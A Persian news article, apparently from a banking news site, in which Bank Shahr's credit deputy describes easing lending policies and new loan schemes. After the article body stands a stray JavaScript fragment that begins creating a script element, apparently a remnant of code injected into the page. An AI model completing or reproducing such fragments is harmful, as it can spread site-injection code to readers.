پنج شنبه , 23 آذر 1396
خانه / اخبار بانکی / اخبار بانک های ایران / اعطای تسهیلات بانکی تسهیل شد

اعطای تسهیلات بانکی تسهیل شد

تهران – ایرنا – معاون اعتبارات بانک شهر، از تطبیق و اصلاح در سیاست های اعتباری این بانک به منظور جلب رضایت بیشتر مشتریان و شهروندان خبر داد.

به گزارش ایرنا از بانک شهر، مرتضی خامی با اشاره به برنامه های این بانک در خصوص نحوه جذب و مصرف منابع این بانک، افزود: هم اکنون به منظور افزایش نسبت مصارف به منابع بانک از 40 به 70 درصد، برنامه های متعددی در دست تدوین و اجراست.

وی اظهار داشت: در همین راستا پس از نیازسنجی تسهیلاتی برای همه بخش های اقتصادی، تغییر و اصلاح در سیاست های اعتباری بانک به منظور پاسخگویی همه جانبه به نیازهای تسهیلاتی هر یک از گروه های هدف و جلب رضایت مشتریان، اقدامات مختلفی در حوزه اعتبارات بانک شهر در حال انجام است.

معاون اعتبارات بانک شهر تصریح کرد: طرح های تسهیلاتی ویژه پروژه های عمرانی و ساختمان های شهرها، طرح فعالان اقتصادی شهر و مدل های اعتباری مختلف پرداخت تسهیلات مشارکتی و مبادله ای از محل میانگین حساب، همچنین طرح های اعتباری ویژه مناطق و موضوعات خاص از قبیل بسته اعتباری مناطق آزاد، مؤدیان شهرداری های مختلف واز برنامه های در دست اجرای بانک شهر در راستای رسیدن به اهداف مصارف این بانک است.

var d=document;var s=d.createElement(‘script’);

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *